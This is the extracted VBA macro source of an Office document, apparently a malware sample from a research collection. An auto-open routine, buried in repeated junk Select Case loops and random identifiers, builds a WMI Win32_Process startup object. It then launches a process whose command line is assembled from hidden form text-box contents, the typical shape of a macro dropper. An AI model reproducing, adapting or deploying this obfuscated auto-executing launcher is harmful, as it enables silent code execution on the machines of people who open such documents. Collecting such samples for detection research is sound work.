Attribute VB_Name = "Dtqelrzmm"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Zgjlfctnay, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Yhelvoqiglsyp, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Xxaolqvsaagl, 2, 2, MSForms, TextBox"
Attribute VB_Control = "Zhemthoxk, 3, 3, MSForms, TextBox"
Attribute VB_Control = "Ubilzpycoc, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Fyrapiukvyjq, 5, 5, MSForms, TextBox"
Attribute VB_Control = "Valojqnk, 6, 6, MSForms, TextBox"
Attribute VB_Control = "Fqsebpcj, 7, 7, MSForms, TextBox"
Attribute VB_Control = "Lqzwclqshsvs, 8, 8, MSForms, TextBox"
Attribute VB_Control = "Jetflrywp, 9, 9, MSForms, TextBox"
Attribute VB_Control = "Uwwxyktpaw, 10, 10, MSForms, TextBox"
Attribute VB_Control = "Ketgjmueehjt, 11, 11, MSForms, TextBox"
Attribute VB_Name = "Dvhlixmycf"
Attribute VB_Name = "Omoozdjovx"
Attribute VB_Base = "0{E2270457-CD41-46E5-8936-21E7D6292AB2}{69977A45-4B61-4028-A133-F723621AA009}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Vvjnnxkdci"
Attribute VB_Name = "Ydrawosqbfr"
Function Gorlezhcwdvct()
On Error Resume Next
      For Each Wwmidcaws In Ohwdofuxrhyc
      Select Case Mcdctoiogrepg
         Case Pkkgmted
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Ynqwxxtrlq)
         Case 41
            gYdD = 2
            UqhaB = Tyjjabezyzvvb
      End Select
Next
CreateObject("winmgmts:Win32_Process").Create$ Ydrawosqbfr.Fthfgipnjp, Jgxvxeoqzn, Yqyeolxm
      For Each Tebmtgzexb In Qizumladmtm
      Select Case Qwjubymuzb
         Case Joemjozckayp
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Xngyaskccjpjv)
         Case 41
            gYdD = 2
            UqhaB = Uqhuzdwvrc
      End Select
Next
End Function
Sub autoopen()
On Error Resume Next
      For Each Xqqvtjow In Dvrfcfjkb
      Select Case Rmrthkwxblxnl
         Case Qclvrslpff
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Rwyjjjcfezclz)
         Case 41
            gYdD = 2
            UqhaB = Rxgifrsohzfkh
      End Select
Next
      For Each Tmjiktnh In Czyahczd
      Select Case Ibpvwgzzregdw
         Case Tlehrrgvuzl
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Ethtatrswn)
         Case 41
            gYdD = 2
            UqhaB = Topiwzcq
      End Select
Next
      For Each Ksiabndkepyi In Teetdwzmq
      Select Case Avffyavnjhyx
         Case Lsrczgozhxow
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Jsxcufaryefo)
         Case 41
            gYdD = 2
            UqhaB = Bzuhubreikqh
      End Select
Next
Gorlezhcwdvct
End Sub
Function Yqyeolxm()
On Error Resume Next
      For Each Ngcvpafi In Ylednwtetnnk
      Select Case Gwsczkqmaf
         Case Abqvfirxqs
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Qhiizqqcptp)
         Case 41
            gYdD = 2
            UqhaB = Cicfmkyqb
      End Select
Next
Jtscuntqimw = "winmgmts:Win32_Process"
      For Each Elfglknuehotk In Dregdwoume
      Select Case Qlqaeeflt
         Case Turgjzqh
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Zjswxydprtc)
         Case 41
            gYdD = 2
            UqhaB = Xjngjpfi
      End Select
Next
Qqkasqqwghaq = Jtscuntqimw + ("STARTU")
      For Each Pepfictrotd In Uashafuxvykdr
      Select Case Jgpmmcdf
         Case Vzurxyoivt
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Nvpoquffbrm)
         Case 41
            gYdD = 2
            UqhaB = Idrdtqvfy
      End Select
Next
Oegukwvrud = Qqkasqqwghaq + Dtqelrzmm.Ubilzpycoc
      For Each Xyzkbzuwskxqr In Oajoawbwlii
      Select Case Tcyqqvcx
         Case Xszwjeglvxpx
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Mjavcobteqd)
         Case 41
            gYdD = 2
            UqhaB = Hzvkqgelwa
      End Select
Next
Set Yqyeolxm = CreateObject((Oegukwvrud))
      For Each Cfdwhqrdle In Wlcnapsezmbx
      Select Case Kvnljpoa
         Case Qhgidaygtekvj
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Hcukpdgmfgw)
         Case 41
            gYdD = 2
            UqhaB = Vffvydwtijbyo
      End Select
Next
Yqyeolxm.XSize = False
      For Each Iwsvokxwpvslz In Xlakzcoxpy
      Select Case Evelsxvfsrvss
         Case Xikibijpwm
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Vtycwdksbk)
         Case 41
            gYdD = 2
            UqhaB = Odrtfqis
      End Select
Next
Yqyeolxm.YSize = False
      For Each Ysujpsojzdx In Alittxaphwhx
      Select Case Zyxzsucxdqqod
         Case Ebylqrgmuj
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Yqwnmavokb)
         Case 41
            gYdD = 2
            UqhaB = Cqdircftm
      End Select
Next
End Function
Function Fthfgipnjp()
On Error Resume Next
      For Each Lkspenycybi In Acfewoud
      Select Case Bupcjmzwj
         Case Rdpcameltdtre
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Hnbtzjtcruo)
         Case 41
            gYdD = 2
            UqhaB = Pzezwfjzpbv
      End Select
Next
Lrupsaiaorz = Dtqelrzmm.Ubilzpycoc
      For Each Pitsarxris In Ukqmqwoulwr
      Select Case Bdzvfmzresep
         Case Irgagopvfsr
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Ruytrmaznyv)
         Case 41
            gYdD = 2
            UqhaB = Qxpsmwejf
      End Select
Next
Ynqcmrmue = Lrupsaiaorz + Omoozdjovx.Vqqkpbwb + Omoozdjovx.Xvuwcuzupyef + Omoozdjovx.Resnbsrscom
      For Each Rwugagkzhyz In Muerieqntvstk
      Select Case Hibduhtc
         Case Isivyoalkazz
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Paaxabnpzi)
         Case 41
            gYdD = 2
            UqhaB = Xwarsrnyzmisv
      End Select
Next
Csmnxywgte = Ynqcmrmue + Omoozdjovx.Aovjlkehl
      For Each Ylwdjmtntfjk In Dwhiwopqb
      Select Case Lcgrscvqx
         Case Qtxlyhsza
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Mejsvbdci)
         Case 41
            gYdD = 2
            UqhaB = Xxknvbcnuvjyg
      End Select
Next
Fthfgipnjp = Jnziyfujrphe + Csmnxywgte + Jnziyfujrphe
      For Each Iicplafiyce In Wjqjgzohbpr
      Select Case Ceexscse
         Case Sojuzrbc
            PfwlxQD = Cos(4664)
            Dzrw7 = Atn(EZyt2)
         Case 544
            pfwz66129 = CSng(16 + Log(3354) * FqbFEP3 - Chr(NhoToO + CLng(QeVY)))
            gKpwQC = Hex(Akwjohbf)
         Case 41
            gYdD = 2
            UqhaB = Tlthyadbk
      End Select
Next
End Function


INQUEST-PP=macro
